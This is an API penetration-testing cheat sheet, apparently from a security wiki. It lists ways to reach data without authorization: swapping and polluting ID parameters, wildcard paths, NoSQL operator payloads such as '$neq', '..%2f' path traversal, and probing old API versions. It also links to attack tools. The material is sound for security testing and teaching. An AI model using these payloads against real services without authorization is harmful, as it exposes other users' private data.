# API Pentesting ## Tricks ### Public and private endpoints Create a list with the public and private endpoints to know which information should be confidential and try to access it in "unathorized" ways. ### Patterns Search for API patterns inside the api and try to use it to discover more. If you find _/api/albums/**<album\_id>**/photos/**<photo\_id>**_ ****you could try also things like _/api/**posts**/<post\_id>/**comment**/_. Use some fuzzer to discover this new endpoints. ### Add parameters Something like the following example might get you access to another user’s photo album: _/api/MyPictureList → /api/MyPictureList?**user\_id=<other\_user\_id>**_ ### Replace parameters You can try to **fuzz parameters** or **use** parameters **you have seen** in a different endpoints to try to access other information For example, if you see something like: _/api/albums?**album\_id=<album id>**_ You could **replace** the **`album_id`** parameter with something completely different and potentially get other data: _/api/albums?**account\_id=<account id>**_ ### Parameter pollution /api/account?**id=<your account id>** → /api/account?**id=<your account id>&id=<admin's account id>** ### Wildcard parameter Try to use the following symbols as wildcards: **\***, **%**, **\_**, **.** * /api/users/\* * /api/users/% * /api/users/\_ * /api/users/. ### HTTP requet method change You can try to use the HTTP methods: **GET, POST, PUT, DELETE, PATCH, INVENTED** to try check if the web server gives you unexpected information with them. ### Request content-type Try to play between the following content-types \(bodifying acordinly the request body\) to make the web server behave unexpectedly: * **x-www-form-urlencoded** --> user=test * **application/xml** --> <user>test</user> * **application/json** --> {"user": "test"} ### Parameters types If **JSON** data is working try so send unexpected data types like: * {"username": "John"} * {"username": true} * {"username": 1} * {"username": \[true\]} * {"username": \["John", true\]} * {"username": {"$neq": "lalala"}} * any other combination you may imagine If you can send **XML** data, check for [XXE injections](../../pentesting-web/xxe-xee-xml-external-entity.md). If you send regular POST data, try to send arrays and dictionaries: * username\[\]=John * username\[$neq\]=lalala ### Play with routes `/files/..%2f..%2f + victim ID + %2f + victim filename` ### Check possible versions Old versions may be still be in use and be more vulenrable than latest endpoints * `/api/v1/login` * `/api/v2/login` * `/api/CharityEventFeb2020/user/pp/` * `/api/CharityEventFeb2021/user/pp/` ## Owasp API Security Top 10 Read this document to learn how to **search** and **exploit** Owasp Top 10 API vulnerabilities: [https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf) ## API Security Checklist {% embed url="https://github.com/shieldfy/API-Security-Checklist" %} ## List of possible API endpoints [https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d) ## Tools [https://github.com/imperva/automatic-api-attack-tool](https://github.com/imperva/automatic-api-attack-tool): Imperva's customizable API attack tool takes an API specification as an input, generates and runs attacks that are based on it as an output. [https://github.com/flipkart-incubator/Astra](https://github.com/flipkart-incubator/Astra): Another tool for api testing